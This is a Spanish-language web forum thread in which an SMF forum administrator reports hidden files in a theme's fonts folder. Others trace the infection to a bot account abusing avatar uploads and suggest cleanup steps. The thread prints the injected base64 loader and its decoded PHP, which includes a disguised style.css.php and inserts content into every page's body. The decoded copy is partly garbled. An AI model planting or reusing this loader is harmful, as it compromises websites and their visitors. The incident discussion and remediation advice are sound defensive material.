Infecion dentro de fonts

[Serakon]

Bueno tube una infección de algo que parecia que cargaba muchos enlaces tipo referencia el foro funcionaba igual pero con 1926 archivos mas 20MB de peso que solo contenían enlaces dentro de /themes/default/fonts
había una carpeta llamada Candice que era la que contenía la mierda muestro la captura del código de uno de sus archivos así lo veis como era.
http://www.imagebam.com/image/a6c7c035876629

elimine esas carpetas infectadas pero desconozco si tmb puedo tener otros archivos o algo en la BD así que decirme si seria mejor instalar de 0 los ficheros y que revisar en la BD gracias y mírense ustedes por si acaso, y si alguien puede decir cual fue mi vulnerabilidad mucho mejor

[AWES0MN]

que version usas?

[Serakon]

1.1.8

por cierto digo los paquetes que tengo instalados

1.     Pando by Serakon      2.0       [ Desinstalar ]  [ Listar archivos ]  [ Borrar ]
2.    Anonymize Links    2.1    [ Aplicar Mod ] [ Listar archivos ] [ Borrar ]
3.    Megavideo & Megarotic    1.0    [ Desinstalar ] [ Listar archivos ] [ Borrar ]
4.    Global Headers Footers    1.4    [ Desinstalar ] [ Listar archivos ] [ Borrar ]
5.    reCAPTCHA for SMF    0.9.5.3    [ Desinstalar ] [ Listar archivos ] [ Borrar ]
6.    SMF 1.0.16 / 1.1.8 Update    1.0    [ Desinstalar ] [ Listar archivos ] [ Borrar ]
7.    Pando by Serakon    2.0    [ Desinstalar ] [ Listar archivos ] [ Borrar ]

Novedad:
mirando archivos muchos an sido editados el 27/04/09 a las 19:08:00 demasiados archivos pa ser editados por mi de golpe en el mismo seg o puede que fuera por actualizar

[Serakon]

todos los archivos tienes esto:
aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcva3VuZGVuL2hvbWVwYWdlcy8zMS9kMjIxMzU3Mzg4L2h0ZG9jcy9mb3JvL1RoZW1lcy9kZWZhdWx0L2ZvbnRzL0NhbmRpY2Uvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9rdW5kZW4vaG9tZXBhZ2VzLzMxL2QyMjEzNTczODgvaHRkb2NzL2Zvcm8vVGhlbWVzL2RlZmF1bHQvZm9udHMvQ2FuZGljZS9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ

Que siginifica:

Code Select Expand

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/kunden/homepages/31/d221357388/htdocs/foro/Themes/default/fonts/Candice/style.css.php')){include_once('/kunden/homepages/31/d221357388/htdocs/foro/Themes/default/fonts/Candice/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/kunden/homepages/31/d221357388/htdocs/foro/Themes/default/fonts/Candice/style.css.php')){include_once('/kunden/homepages/31/d221357388/htdocs/foro/Themes/default/fonts/Candice/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

[AWES0MN]

no recuerdo de q venia la carpeta font.. sera el recaptcha?

nome acuerdo ,si alguien save..

[cz99]

no tendras en tu foro un usuario que se llama KRISBARTEO¿?

[Serakon]

866      krisbarteo       krisbarteo       [email protected]       94.142.129.147       26 días

justo el día de la infección...

[cz99]

Ese el hijo de..... que esta jorobando Nuestros foros. Aun no se si hay una solucion, a mi se me colo en el foro

Algunas de las cosas que he realizado:

- Con tu programa FTP o desde el CPANEL de tu host, Ubica el avatar de dicho usuario y eliminalo
- Luego elimina el usuario
- Tanto en el foro como en tu host Bloquea su direccion IP - 94.*.*.* total creo que tampoco necesitas visitas de Litvania.
- No olvides eliminar todos los archivos que encontraste.

Como una medida adicional de precaucion en tu panel de control desabilita que los nuevos usuarios puedan subir avatares y tambien desabilita los adjuntos de los post.

Añade el mod stop spammers, y el mod anti bot.

Por un tiempo utiliza la opcion de que la activacion  de usuarios nuevos sea autorizado por un administrador.

Si encuentras algo mas que pueda ser de ayuda postealo, somos muchos que andamos en este problema.

No olvides actualizar tu foro a la version mas reciente, los muchachos de SMF me imagino que ya estan solucionando este problemilla.


Saludos desde el Perú.

[M-DVD]

Ese el hijo de..... que esta jorobando Nuestros foros.

XD

Sí, esa es la causa.

elimine esas carpetas infectadas pero desconozco si tmb puedo tener otros archivos o algo en la BD así que decirme si seria mejor instalar de 0 los ficheros y que revisar en la BD gracias y mírense ustedes por si acaso, y si alguien puede decir cual fue mi vulnerabilidad mucho mejor

Sí, hasta donde sé, la mejor solución es borrar todo lo que tengas en el host (claro, sacar un backup de tus DB) y subir de nuevo todos los archivos limpios. Esto incluye todo lo que tengas en tu host, por ejemplo si tenías SMF en una carpeta y Wordpress en otra, debes resubir todo, porque la infección se extiende a todo lo que tengas en el host.

La causa de la falla era un agujero en todos los SMF para la fecha, pero YA FUE corregido en las versiones últimas (esa fue la causa principal del último update).

Así que como medida de seguridad, además de banear a ese usuario (y seguro está registrado otro de sus alias, ejm MagicOPromotion); borrarlo todo y resubirlo limpio, debes subir una versión nueva e instalar uno o dos MODs antibot.

¿El reCaptcha lo tenías instalado cuando se registró krisbarteo?

[Serakon]

si tenia el recatcha y el usuario ni le borre le deje como baneo me parece total por que tenga el usuario no v a apoder acer nada por que ya no se puede subir avatar asi que si ace algo que me sorprenda xD, y lo de que la infeccion se extiende a mi no se me a extendido por que el foro lo tengo aislado con su subdominio con solo acceso a esa carpeta asi que mis Datalife están intactatos, y la BD parece intacta o eso creo por lo menos no a vuelto  infectarlo

PD: alguien tiene el avatar que utiliza para infectar. si se tiene eso se podra poner la solucion yo es que lo pete aunq creo que lo conservo... en una copia de seguridad

[XiriC]

Ha welto a darle a una, --> 94.142.129.147 <-- diganmesi es fija pls.

Y gracias por la info.

[rusoariel]

866      krisbarteo       krisbarteo       [email protected]       94.142.129.147       26 días

justo el día de la infección...

seguro es un bot, ya que si pones krisbarteo aparece 526000 veces por lo general en perfiles de foros.

[PortalGamers]

Pues vaya... en google lo buscas y esta en muchisimos foros...
http://www.google.es/search?q=krisbarteo+&sourceid=navclient-ff&ie=UTF-8&rlz=1B2PBFA_esES255ES255

[4KING.GA~]

son puros virus de publicidad :XD

[aBsTrAcTo]

Puff si que encuentra foros racilmente ese boot